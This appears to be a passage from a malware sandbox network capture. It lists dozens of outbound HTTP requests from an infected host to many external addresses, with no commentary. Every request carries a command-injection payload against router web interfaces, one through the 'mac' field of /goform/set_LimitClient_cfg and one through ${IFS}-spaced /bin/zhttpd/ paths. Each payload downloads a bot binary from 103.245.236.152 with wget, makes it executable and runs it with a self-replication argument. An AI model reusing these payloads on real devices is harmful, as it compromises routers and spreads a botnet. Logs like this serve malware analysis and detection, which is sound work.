                                          Jan 14, 2024 15:46:23.485166073 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6141192.168.2.2350534124.197.149.1248080
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.087249041 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                          Jan 14, 2024 15:46:25.535659075 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                          Jan 14, 2024 15:46:27.263375044 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                          Jan 14, 2024 15:46:30.942910910 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6142192.168.2.235506818.48.129.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.141550064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6143192.168.2.233885662.223.168.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.141611099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6144192.168.2.2337628130.181.162.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.141650915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6145192.168.2.234066470.137.194.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.141700983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6146192.168.2.2351606116.170.115.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.141712904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6147192.168.2.2344850116.101.9.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.141767979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6148192.168.2.233767472.87.215.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.141789913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6149192.168.2.236068497.41.77.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.141834974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6150192.168.2.234189496.104.153.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.141896963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6151192.168.2.234324485.110.159.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.141917944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6152192.168.2.2338666158.234.65.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.141994953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6153192.168.2.235845673.172.17.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142019033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6154192.168.2.2341582135.49.62.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142055035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6155192.168.2.2348860180.232.29.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142132044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6156192.168.2.2342964129.76.80.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142149925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6157192.168.2.233749244.64.106.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142220974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6158192.168.2.2334236105.251.217.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142246962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6159192.168.2.235870425.20.80.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142281055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6160192.168.2.2352460118.187.188.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142308950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6161192.168.2.234311672.43.127.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142335892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6162192.168.2.235865623.50.121.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142400026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6163192.168.2.234578647.179.55.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142455101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6164192.168.2.2351748133.217.188.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142488956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6165192.168.2.2351024100.164.95.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142519951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6166192.168.2.235449079.202.37.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142540932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6167192.168.2.2360508117.75.85.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142555952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6168192.168.2.2336740129.35.223.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142617941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6169192.168.2.2333860222.250.108.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142674923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6170192.168.2.235718490.48.215.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142740965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6171192.168.2.2354458128.43.71.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142785072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6172192.168.2.2343520203.144.221.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142788887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6173192.168.2.235877487.193.246.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142849922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6174192.168.2.235754066.47.194.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142872095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6175192.168.2.2359768173.243.194.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142894030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6176192.168.2.2340180200.172.155.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142949104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6177192.168.2.233502014.205.5.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.142972946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6178192.168.2.235775071.172.220.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.143038034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6179192.168.2.2344174122.64.120.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.143054962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6180192.168.2.2354954217.181.154.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.143105030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6181192.168.2.234560269.61.22.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.143146992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6182192.168.2.234439635.187.140.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.143187046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6183192.168.2.234833492.38.161.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.143243074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6184192.168.2.2353714163.244.49.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.143280029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6185192.168.2.2337280153.53.43.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.143306971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6186192.168.2.2352074118.234.235.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.143347025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6187192.168.2.2338508186.174.174.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.143399000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6188192.168.2.235043614.201.232.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.143435955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6189192.168.2.2347770195.240.25.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.143476963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6190192.168.2.233760225.37.23.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.143527031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6191192.168.2.235649258.128.78.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:24.143578053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6192192.168.2.2347860198.209.141.237443
                                          TimestampBytes transferredDirectionData
